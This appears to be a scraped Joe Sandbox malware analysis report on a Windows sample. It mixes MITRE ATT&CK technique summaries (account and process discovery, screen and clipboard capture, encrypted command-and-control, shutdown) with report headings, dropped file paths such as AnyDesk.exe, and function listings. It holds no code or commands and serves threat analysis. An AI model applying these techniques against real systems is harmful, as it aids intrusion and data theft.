Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SecuriteInfo.com.FileRepMalware.14270.3068.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\1img.png

C:\Users\user\AppData\Roaming\Microsoft\Windows\2img.png

C:\Users\user\AppData\Roaming\Microsoft\Windows\3img.png

C:\Users\user\AppData\Roaming\Microsoft\Windows\AnyDesk.exe

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Network Port Distribution

Windows Analysis Report
SecuriteInfo.com.FileRepMalware.14270.3068.exe

Function 0000000140056130 Relevance: 65.2, APIs: 35, Strings: 2, Instructions: 462
registrywindowCOMMON

Function 000000014001EF90 Relevance: 54.5, APIs: 22, Strings: 9, Instructions: 233
windowregistryCOMMON

Function 00000001400D2AC4 Relevance: 44.2, APIs: 24, Strings: 1, Instructions: 465
COMMONLIBRARYCODE

Function 000000014007E490 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 230
networkfilewindowCOMMON

Function 00000001400B2650 Relevance: 15.1, APIs: 10, Instructions: 145
threadCOMMON

Function 0000000140005690 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 102
sleepwindowCOMMON

Function 00000001400AF3A0 Relevance: 19.7, APIs: 13, Instructions: 164
windowlibraryCOMMON

Function 000000014001F770 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 296
timeCOMMON

Function 0000000140036EED Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 264
windowclipboardCOMMON

Function 00000001400CD974 Relevance: 18.1, APIs: 12, Instructions: 93
COMMON

Function 000000014003330C Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 240
windowclipboardCOMMON

Function 0000000140038239 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 237
windowclipboardCOMMON

Function 0000000140037BEE Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 224
windowclipboardCOMMON

Function 00000001400053F0 Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 318
COMMON

Function 00000001400388CF Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 233
windowclipboardCOMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre